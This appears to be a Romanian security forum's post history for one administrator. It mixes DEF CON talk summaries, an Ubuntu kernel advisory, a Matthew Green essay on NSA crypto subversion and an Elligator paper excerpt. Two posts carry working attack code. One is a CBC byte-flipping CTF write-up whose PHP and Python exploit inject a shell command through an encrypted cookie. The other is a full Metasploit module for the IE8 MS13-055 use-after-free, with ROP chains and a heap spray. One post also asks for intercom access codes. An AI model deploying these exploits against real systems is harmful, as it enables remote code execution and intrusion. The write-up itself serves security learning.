Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. STUPID. Nu se previne SQL Injection din .htaccess. Porcaria asta: RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR] NU se poate numi filtrare! Pe langa faptul ca nu previne nimic ci doar incurca putin atacatorul, mai poate provoca si grave probleme de functionalitate. SQL Injection ca si orice alt tip de problema de securitate pe parte de aplicatie web se filtreaza din aplicatia web!
  2. Eu sunt multumit daca imi spui coduri de acces la diferite interfoane
  3. Def Con 21 Presentation By Zoz - Hacking Driverless Vehicles - Video And Slides Description: Hacking Driverless Vehicles by Zoz Cannytrophic Design Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. All trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and light-hearted look at the current state of civil driverless vehicles and what hackers or miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. He will also present details of how students can get involved in the ultimate sports events for robot hacking, the autonomous vehicle competitions. Zoz is a robotics interface designer and rapid prototyping specialist. He is a co-founder of Cannytrophic Design in Boston and CTO of BlueSky in San Francisco. As co-host of the Discovery Channel show 'Prototype This!' he pioneered urban pizza delivery with robotic vehicles, including the first autonomous crossing of an active highway bridge in the USA, and airborne delivery of life preservers at sea from an autonomous aircraft. He also hosts the annual AUVSI Foundation student autonomous robot competitions such as Roboboat and Robosub. For More information please visit : - Defcon.org Sursa: Def Con 21 Presentation By Zoz - Hacking Driverless Vehicles - Video And Slides
  4. Def Con 21 Presentation By Mudge - Unexpected Stories From A Hacker Inside The Government Description: Unexpected Stories From a Hacker Who Made it Inside the Government by Peiter Mudge Zatko Having had the opportunity to see things from within the hacker community and from a senior position in the DoD, Mudge has some enlightening stories to share, and is picking some of his favorites. He'll discuss Julian's story to him about US government involvement in the origins of Wikileaks, how the DoD accidentally caused Anonymous to target government systems, some of the ways in which the defense industrial base's poor security works financially in its favor, and cases where the government missed opportunities for positive outreach and understanding with this community. You'll probably recognize parts of these stories from the news, but there are origins and back stories that are lesser known, and that should make for a good story time. For More Information please visit : - Defcon.org Sursa: Def Con 21 Presentation By Mudge - Unexpected Stories From A Hacker Inside The Government
  5. New Kernel Vulnerabilities Affect Ubuntu 12.10 September 11th, 2013, 07:10 GMT · By Marius Nestor - Ubuntu 12.10 Canonical announced a few days ago that a kernel update is available for its Ubuntu 12.10 (Quantal Quetzal) Linux operating system, fixing eight vulnerabilities found in the Linux kernel packages. The following eight Linux kernel vulnerabilities affect Ubuntu 12.10 (Quantal Quetzal): CVE-2012-5374, CVE-2012-5375, CVE-2013-1060, CVE-2013-2140, CVE-2013-2232, CVE-2013-2234, CVE-2013-4162, and CVE-2013-4163. As usual, you can click on each one to see how it affects your system, or go here for in-depth descriptions, as it affects other Linux distributions as well. The security flaws can be fixed if you upgrade your system(s) to the linux-image-3.5.0-40 (3.5.0-40.62) package(s). For detailed instructions on how to upgrade your system, see the following link: https://wiki.ubuntu.com/Security/Upgrades. We inform everyone that Ubuntu 13.04, Ubuntu 12.04 LTS and Ubuntu 10.04 LTS also received kernel updates today. Don't forget to reboot your computer after the upgrade. Sursa: New Kernel Vulnerabilities Affect Ubuntu 12.10
  6. CBC Byte Flipping Attack - 101 Approach As usual, there are some explanations about this attack out there (see references at the end), but requires some knowledge to understand it properly, so, here I will describe step by step how to perform this attack. Purpose of the Attack: To change a byte in the plaintext by corrupting a byte in the ciphertext. Why? To bypass filters by adding malicious chars like a single quote, or to elevate privileges by changing the ID of the user to Admin, or any other consequence of changing the plaintext expected by an Application. Introduction First of all, let's start understanding how CBC (Cipher-block chaining) works. A detailed explanation can be found here: Block cipher mode of operation - Wikipedia, the free encyclopedia But I will only explain what is needed to understand the attack. Encryption process: Plaintext: The data to be encrypted. IV: A block of bits that is used to randomize the encryption and hence to produce distinct ciphertexts even if the same plaintext is encrypted multiple times. Key: Used by Symmetric Encryption Algorithms like AES, Blowfish, DES, Triple DES, etc. Ciphertext: The data encrypted. An important point here is that CBC works on fixed-length group of bits called a block. In this blog, we will use blocks of 16 bytes each. Since I hate mathematical formulas, below is mine: Ciphertext-0 = Encrypt(Plaintext XOR IV) - Just for the first block Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1) - For second and remaining blocks. Note: As you can see, the ciphertext of the previous block is used to generate the next one. Decryption Process: Plaintext-0 = Decrypt(Ciphertext) XOR IV - Just for the first block Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1 - For second and remaining blocks. Note: The Ciphertext-N-1 is used to generate the Plaintext of the next block, this is where Byte Flipping Attack comes into play. If we change one byte of the Ciphertext-N-1 then when XORing with the net Decrypted block we will get a different Plaintext! You got it? Do not worry, we will see a detailed example below. Meanwhile, below is a nice diagram explaining this attack: Example: CBC Blocks of 16 bytes. Let's say we have this serialized plaintext: a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";} Our target is to change the number 6 at "s:6" to number "7". First thing we need to do is to split the plaintext into 16 bytes chunks: Block 1: a:2:{s:4:"name"; Block 2 s:6:"sdsdsd";s:8 <<<-----target div="" here=""> Block 3: :"greeting";s:20: Block 4: "echo 'Hello sd Block 5: sdsd!'";} So, our target char is located at block 2 which means, we need to change the ciphertext of Block 1 to change the plaintext of the second block. A rule of thumb is that the byte you change in a ciphertext will ONLY affect a byte at same offset of next plaintext. Since our target is at offset 2: [0] = s [1] = : [2] = 6 Therefore, we need to change the byte at offset 2 of the first ciphertext block. As you can see in the code below, at line 2 we get the ciphertext of the whole data, then at line 3 we change the byte of block 1 at offset 2 and finally we call the decryption function. 1. $v = "a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}"; 2. $enc = @encrypt($v); 3. $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); 4. $b = @decrypt($enc); After running this code we are able to change number 6 to 7: But, how did we change the byte to the value we wanted at line 3? Based on the decryption process described above, we know that A = Decrypt(Ciphertext) is XOR with B = Ciphertext-N-1 to finally get C = 6. Which is equal to: C = A XOR B So, here the only value we do not know is A (block cipher decryption), so, with XOR we can easily get that value by doing: A = B XOR C And finally, A XOR B XOR C is equal to 0. With this formula, we can set our own value by adding it at the end of the XOR calculation, like: A XOR B XOR C XOR "7" will give us 7 in the plaintext at offset 2 on the second block. Below is the PHP source code so that you can replicate it: [Code Starts Here] define('MY_AES_KEY', "abcdef0123456789"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes,$data) : mdecrypt_generic($aes,$data); } define('MY_MAC_LEN', 40); function encrypt($data) { return aes($data, true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); return $data; } $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}"; echo "Plaintext before attack: $v\n"; $b = array(); $enc = array(); $enc = @encrypt($v); $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); $b = @decrypt($enc); echo "Plaintext AFTER attack : $b\n"; [Code Ends Here] Try changing the char from "7" to "A" or something else to see how it works. Exercise 2: Now that we understood how this attack works, let's do a more real-world exercise. Some weeks ago took place the CTF Competition hosted by the team Eindbazen, there was a Web 400 challenge called "Moo!", You can see all the details of this task at the end of the blog in the reference 2 and 3, here I am just going to describe the final steps of breaking CBC. We were provided with the source code for analysis, below is the chunk important for this exercise: Basically, you will submit any text in the POST parameter "name" and the App will respond with a Hello message concatenating the text submitted at the end, but two things happens before printing back the message: 1. The POST "name" parameter is filtered out by PHP escapeshellarg() function (which mainly will escape single quotes to prevent injecting malicious commands), then store it in the Array->greeting field to finally creating a cookie encrypted with this value. 2. Then the content of Array->greeting field is executed via PHP passthru() function, which is used to execute System commands. 3. Finally, anytime the page is accessed, if the cookie already exist, it will be decrypted and then its content executed via passthru() function. Here is where our CBC attack will give us a different plaintext as explained in previous section. So, I tried to inject below string in the POST parameter "name": name = 'X' + ';cat *;#a' I added the char "X" which is the one to be replaced with a single quote via CBC byte flipping attack, then the command to be executed ;cat *; and finally an "#" which is interpreted as a comment by the shell so that we do not get problems with the last single quote inserted by escapeshellarg() function and therefore our command gets executed successfully. After calculating the exact offset of previous ciphertext block byte to be changed (offset 51), I executed below code to inject a single quote: pos = 51; val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0os] + val + cookie[pos + 1:] I am altering the cookie since it has the whole ciphertext. Finally, I got below result: First, we can see in yellow that our "X" was successfully change to a single quote in the second block, but since the first block was altered, it got garbage inserted (in green) which causes an error when trying to unserialize() the data (in red), and therefore, the app did not even try to execute our injection. How to fix it? So, basically, we need to play with our injected data until we get garbage in the first block that does not cause any problem during unserialization. A way to get around it is by padding our malicious command with alphabetic chars. Therefore we come up with this injection string padding with multiple 'z' before and after: name = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 After sending above string, voila!!!, unserialize() does not complain with the garbage received and our shell command is executed successfully!!!! If you want to replicate this exercise, below in the Appendix section is the PHP code running on the server side and the python script (little bit modified from code provided by Daniel from hardc0de.ru, thanks!!!) to perform the exploitation. Finally, I want to thank the guys of the references mentioned below for writing those excellent blogs. References: 1. CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto 2. http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/ 3. http://hardc0de.ru/2013/08/04/ebctf-web400/ Enjoy it! Appendix: PHP code: ini_set('display_errors',1);error_reporting(E_ALL); define('MY_AES_KEY', "abcdef0123456789"); define('MY_HMAC_KEY',"1234567890123456" ); #define("FLAG","CENSORED"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($aes), MCRYPT_RAND); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data); } define('MY_MAC_LEN', 40); function hmac($data) { return hash_hmac('sha1', data, MY_HMAC_KEY); } function encrypt($data) { return aes($data . hmac($data), true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); $mac = substr($data, -MY_MAC_LEN); $data = substr($data, 0, -MY_MAC_LEN); return hmac($data) === $mac ? $data : null; } $settings = array(); if (@$_COOKIE['settings']) { echo @decrypt(base64_decode($_COOKIE['settings'])); $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings']))); } if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) { $settings = array( 'name' => $_POST['name'], 'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")), ); setcookie('settings', base64_encode(@encrypt(serialize($settings)))); #setcookie('settings', serialize($settings)); } $d = array(); if (@$settings['greeting']) { passthru($settings['greeting']); } else { echo "What is your name? echo "input name='name' type='text'"; echo "input name='submit' type='submit' "; } Exploit: #!/usr/bin/pythonimport requests import sys import urllib from base64 import b64decode as dec from base64 import b64encode as enc url = 'http://192.168.184.133/ebctf/mine.php' def Test(x): t = "echo 'Hello %s!'" % x s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40) for i in xrange(0,len(s),16): print s[i:i+16] print '\n' def Pwn(s): global url s = urllib.quote_plus(enc(s)) req = requests.get(url, cookies = {'settings' : s}).content # if req.find('works') != -1: print req # else: # print '[-] FAIL' def GetCookie(name): global url d = { 'name':name, 'submit':'Submit' } h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers if h.has_key('set-cookie'): h = dec(urllib.unquote_plus(h['set-cookie'][9:])) #h = urllib.unquote_plus(h['set-cookie'][9:]) #print h return h else: print '[-] ERROR' sys.exit(0) #a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";} #a:2:{s:4:"name"; #s:10:"X;cat *;#a #";s:8:"greeting" #;s:24:"echo 'Hel #lo X;cat *;#a!'" #;} #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";} #a:2:{s:4:"name"; #s:42:"zzzzzzzzzz #zzzzzzzX;cat *;# #zzzzzzzzzzzzzzzz #";s:8:"greeting" #;s:56:"echo 'Hel #lo zzzzzzzzzzzzz #zzzzX;cat *;#zzz #zzzzzzzzzzzzz!'" #;} #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success #exploit = "______________________________________________________; cat *;#" #Test(exploit) cookie = GetCookie(exploit) pos = 100; #test case success #pos = 51; #test case first, unsuccess val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:] Pwn(exploit) Posted by Danux at 12:24 PM Sursa: http://danuxx.blogspot.ro/2013/09/cbc-byte-flipping-attack-101-approach.html
  7. [h=1]MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free", 'Description' => %q{ In IE8 standards mode, it's possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement's outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it's trying to make a call to the object's SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Orange Tsai at Hitcon 2013, but was silently patched in the July 2013 update. }, 'License' => MSF_LICENSE, 'Author' => [ 'Orange Tsai', # Original discovery, PoC 'Peter Vreugdenhil', # Joins the party (wtfuzz) 'sinn3r' # Joins the party ], 'References' => [ [ 'MSB', 'MS13-055' ], [ 'URL', 'https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret 'Align' => 0x77c4d801 # add esp, 0x2c; ret } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Pivot' => 0x7c348b05, # xchg eax, esp; ret 'Align' => 0x7C3445F8 # add esp, 0x2c; ret } ] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Jul 09 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) return t end end nil end def get_payload(t, cli) rop = '' code = payload.encoded esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 case t['Rop'] when :msvcrt # Stack adjustment # add esp, -3500 esp_align = "\x81\xc4\x54\xf2\xff\xff" print_status("Using msvcrt ROP") rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") else print_status("Using JRE ROP") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] 0x7c3415a2, # JMP [EAX] [msvcr71.dll] 0xffffffff, 0x7c376402, # skip 4 bytes [msvcr71.dll] 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 0x7c344f87, # POP EDX # RETN [msvcr71.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] 0x7c34d201, # POP ECX # RETN [msvcr71.dll] 0x7c38b001, # &Writable location [msvcr71.dll] 0x7c347f97, # POP EAX # RETN [msvcr71.dll] 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll] # rop chain generated with mona.py ].pack("V*") end rop_payload = rop rop_payload << esp_align rop_payload << code rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt rop_payload end def junk rand_text_alpha(4).unpack("V")[0].to_i end def nop make_nops(4).unpack("V")[0].to_i end def get_html(t, p) js_pivot = Rex::Text.to_unescape([t['Pivot']].pack("V*")) js_payload = Rex::Text.to_unescape(p) js_align = Rex::Text.to_unescape([t['Align']].pack("V*")) js_junk = Rex::Text.to_unescape([junk].pack("V*")) q_id = Rex::Text.rand_text_alpha(1) html = %Q| <!DOCTYPE html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> </head> <script> #{js_mstime_malloc} window.onload = function() { var x = document.getElementById("#{q_id}"); x.outerText = ""; a = document.getElementById('myanim'); p = ''; for (i=0; i < 7; i++) { p += unescape("#{js_junk}"); } p += unescape("#{js_payload}"); fo = unescape("#{js_align}"); for (i=0; i < 28; i++) { if (i == 27) { fo += unescape("#{js_pivot}"); } else { fo += unescape("#{js_align}"); } } fo += p; mstime_malloc({shellcode:fo, heapBlockSize:0x68, objId:"myanim"}); } </script> <table> <tr> <div> <span> <q id='#{q_id}'> <a> <td></td> </a> </q> </span> </div> </tr> </table> <t:ANIMATECOLOR id="myanim"/> </html> | html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] t = get_target(agent) if t p = get_payload(t, cli) html = get_html(t, p) print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) else print_error("Not a suitable target: #{agent}") send_not_found(cli) end end end Sursa: MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
  8. [h=3]On the NSA[/h]Let me tell you the story of my tiny brush with the biggest crypto story of the year. A few weeks ago I received a call from a reporter at ProPublica, asking me background questions about encryption. Right off the bat I knew this was going to be an odd conversation, since this gentleman seemed convinced that the NSA had vast capabilities to defeat encryption. And not in a 'hey, d'ya think the NSA has vast capabilities to defeat encryption?' kind of way.No, he'd already established the defeating. We were just haggling over the details. Oddness aside it was a fun (if brief) set of conversations, mostly involving hypotheticals. If the NSA could do this, how might they do it? What would the impact be? I admit that at this point one of my biggest concerns was to avoid coming off like a crank. After all, if I got quoted sounding too much like an NSA conspiracy nut, my colleagues would laugh at me. Then I might not get invited to the cool security parties. All of this is a long way of saying that I was totally unprepared for today's bombshell revelations describing the NSA's efforts to defeat encryption. Not only does the worst possible hypothetical I discussed appear to be true, but it's true on a scale I couldn't even imagine. I'm no longer the crank. I wasn't even close to cranky enough. And since I never got a chance to see the documents that sourced the NYT/ProPublica story -- and I would give my right arm to see them -- I'm determined to make up for this deficit with sheer speculation. Which is exactly what this blog post will be. 'Bullrun' and 'Cheesy Name' If you haven't read the ProPublica/NYT or Guardian stories, you probably should. The TL;DR is that the NSA has been doing some very bad things. At a combined cost of $250 million per year, they include: Tampering with national standards (NIST is specifically mentioned) to promote weak, or otherwise vulnerable cryptography. Influencing standards committees to weaken protocols. Working with hardware and software vendors to weaken encryption and random number generators. Attacking the encryption used by 'the next generation of 4G phones'. Obtaining cleartext access to 'a major internet peer-to-peer voice and text communications system' (Skype?) Identifying and cracking vulnerable keys. Establishing a Human Intelligence division to infiltrate the global telecommunications industry. And worst of all (to me): somehow decrypting SSL connections. All of these programs go by different code names, but the NSA's decryption program goes by the name 'Bullrun' so that's what I'll use here. How to break a cryptographic system There's almost too much here for a short blog post, so I'm going to start with a few general thoughts. Readers of this blog should know that there are basically three ways to break a cryptographic system. In no particular order, they are: Attack the cryptography. This is difficult and unlikely to work against the standard algorithms we use (though there are exceptions like RC4.) However there are many complex protocols in cryptography, and sometimes they are vulnerable. Go after the implementation. Cryptography is almost always implemented in software -- and software is a disaster. Hardware isn't that much better. Unfortunately active software exploits only work if you have a target in mind. If your goal is mass surveillance, you need to build insecurity in from the start. That means working with vendors to add backdoors. Access the human side. Why hack someone's computer if you can get them to give you the key? Bruce Schneier, who has seen the documents, says that 'math is good', but that 'code has been subverted'. He also says that the NSA is 'cheating'. Which, assuming we can trust these documents, is a huge sigh of relief. But it also means we're seeing a lot of (2) and (3) here. So which code should we be concerned about? Which hardware? [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]SSL Servers by OS type. Source: Netcraft.[/TD] [/TR] [/TABLE] This is probably the most relevant question. If we're talking about commercial encryption code, the lion's share of it uses one of a small number of libraries. The most common of these are probably the Microsoft CryptoAPI (and Microsoft SChannel) along with the OpenSSL library. Of the libraries above, Microsoft is probably due for the most scrutiny. While Microsoft employs good (and paranoid!) people to vet their algorithms, their ecosystem is obviously deeply closed-source. You can view Microsoft's code (if you sign enough licensing agreements) but you'll never build it yourself. Moreover they have the market share. If any commercial vendor is weakening encryption systems, Microsoft is probably the most likely suspect. And this is a problem because Microsoft IIS powers around 20% of the web servers on the Internet -- and nearly forty percent of the SSL servers! Moreover, even third-party encryption programs running on Windows often depend on CAPI components, including the random number generator. That makes these programs somewhat dependent on Microsoft's honesty. Probably the second most likely candidate is OpenSSL. I know it seems like heresy to imply that OpenSSL -- an open source and widely-developed library -- might be vulnerable. But at the same time it powers an enormous amount of secure traffic on the Internet, thanks not only to the dominance of Apache SSL, but also due to the fact that OpenSSL is used everywhere. You only have to glance at the FIPS CMVP validation lists to realize that many 'commercial' encryption products are just thin wrappers around OpenSSL. Unfortunately while OpenSSL is open source, it periodically coughs up vulnerabilities. Part of this is due to the fact that it's a patchwork nightmare originally developed by a programmer who thought it would be a fun way to learn Bignum division.* Part of it is because crypto is unbelievably complicated. Either way, there are very few people who really understand the whole codebase. On the hardware side (and while we're throwing out baseless accusations) it would be awfully nice to take another look at the Intel Secure Key integrated random number generators that most Intel processors will be getting shortly. Even if there's no problem, it's going to be an awfully hard job selling these internationally after today's news. Which standards? From my point of view this is probably the most interesting and worrying part of today's leak. Software is almost always broken, but standards -- in theory -- get read by everyone. It should be extremely difficult to weaken a standard without someone noticing. And yet the Guardian and NYT stories are extremely specific in their allegations about the NSA weakening standards. The Guardian specifically calls out the National Institute of Standards and Technology (NIST) for a standard they published in 2006. Cryptographers have always had complicated feelings about NIST, and that's mostly because NIST has a complicated relationship with the NSA. Here's the problem: the NSA ostensibly has both a defensive and an offensive mission. The defensive mission is pretty simple: it's to make sure US information systems don't get pwned. A substantial portion of that mission is accomplished through fruitful collaboration with NIST, which helps to promote data security standards such as the Federal Information Processing Standards (FIPS) and NIST Special Publications. I said cryptographers have complicated feelings about NIST, and that's because we all know that the NSA has the power to use NIST for good as well as evil. Up until today there's been no real evidence of malice, despite some occasional glitches -- and compelling evidence that at least one NIST cryptographic standard could have contained a backdoor. But now maybe we'll have to re-evaluate that relationship. As utterly crazy as it may seem. Unfortunately, we're highly dependent on NIST standards, ranging from pseudo-random number generators to hash functions and ciphers, all the way to the specific elliptic curves we use in SSL/TLS. While the possibility of a backdoor in any of these components does seem remote, trust has been violated. It's going to be an absolute nightmare ruling it out. Which people? Probably the biggest concern in all this is the evidence of collaboration between the NSA and unspecified 'telecom providers'. We already know that the major US (and international) telecom carriers routinely assist the NSA in collecting data from fiber-optic cables. But all this data is no good if it's encrypted. While software compromises and weak standards can help the NSA deal with some of this, by far the easiest way to access encrypted data is to simply ask for -- or steal -- the keys. This goes for something as simple as cellular encryption (protected by a single key database at each carrier) all the way to SSL/TLS which is (most commonly) protected with a few relatively short RSA keys. The good and bad thing is that as the nation hosting the largest number of popular digital online services (like Google, Facebook and Yahoo) many of those critical keys are located right here on US soil. Simultaneously, the people communicating with those services -- i.e., the 'targets' -- may be foreigners. Or they may be US citizens. Or you may not know who they are until you scoop up and decrypt all of their traffic and run it for keywords. Which means there's a circumstantial case that the NSA and GCHQ are either directly accessing Certificate Authority keys** or else actively stealing keys from US providers, possibly (or probably) without executives' knowledge. This only requires a small number of people with physical or electronic access to servers, so it's quite feasible.*** The one reason I would have ruled it out a few days ago is because it seems so obviously immoral if not illegal, and moreover a huge threat to the checks and balances that the NSA allegedly has to satisfy in order to access specific users' data via programs such as PRISM. To me, the existence of this program is probably the least unexpected piece of all the news today. Somehow it's also the most upsetting. So what does it all mean? I honestly wish I knew. Part of me worries that the whole security industry will talk about this for a few days, then we'll all go back to our normal lives without giving it a second thought. I hope we don't, though. Right now there are too many unanswered questions to just let things lie. The most likely short-term effect is that there's going to be a lot less trust in the security industry. And a whole lot less trust for the US and its software exports. Maybe this is a good thing. We've been saying for years that you can't trust closed code and unsupported standards: now people will have to verify. Even better, these revelations may also help to spur a whole burst of new research and re-designs of cryptographic software. We've also been saying that even open code like OpenSSL needs more expert eyes. Unfortunately there's been little interest in this, since the clever researchers in our field view these problems as 'solved' and thus somewhat uninteresting. What we learned today is that they're solved all right. Just not the way we thought. Notes: * The original version of this post repeated a story I heard recently (from a credible source!) about Eric Young writing OpenSSL as a way to learn C. In fact he wrote it as a way to learn Bignum division, which is way cooler. Apologies Eric! ** I had omitted the Certificate Authority route from the original post due to an oversight -- thanks to Kenny Patterson for pointing this out -- but I still think this is a less viable attack for passive eavesdropping (that does not involve actively running a man in the middle attack). And it seems that much of the interesting eavesdropping here is passive. *** The major exception here is Google, which deploys Perfect Forward Secrecy for many of its connections, so key theft would not work here. To deal with this the NSA would have to subvert the software or break the encryption in some other way. Posted by Matthew Green at 11:27 PM Sursa: A Few Thoughts on Cryptographic Engineering: On the NSA
  9. Elligator: Elliptic-curve points indistinguishable from uniform random strings Daniel J. Bernstein1;3 1Department of Computer Science University of Illinois at Chicago Chicago, IL 60607–7045 USA djb@cr.yp.to Anna Krasnova2 2Privacy & Identity lab Institute for Computing and Information Sciences Radboud University Nijmegen Heyendaalseweg 135 6525 AJ Nijmegen The Netherlands anna@mechanicalmind. org Tanja Lange3 3Department of Mathematics and Computer Science Technische Universiteit Eindhoven P.O. Box 513 5600 MB Eindhoven The Netherlands tanja@hyperelliptic.org ABSTRACT Censorship-circumvention tools are in an arms race against censors. The censors study all trac passing into and out of their controlled sphere, and try to disable censorshipcircumvention tools without completely shutting down the Internet. Tools aim to shape their trac patterns to match unblocked programs, so that simple trac proling cannot identify the tools within a reasonable number of traces; the censors respond by deploying rewalls with increasingly sophisticated deep-packet inspection. Cryptography hides patterns in user data but does not evade censorship if the censor can recognize patterns in the cryptography itself. In particular, elliptic-curve cryptography often transmits points on known elliptic curves, and those points are easily distinguishable from uniform random strings of bits. This paper introduces high-security high-speed ellipticcurve systems in which elliptic-curve points are encoded so as to be indistinguishable from 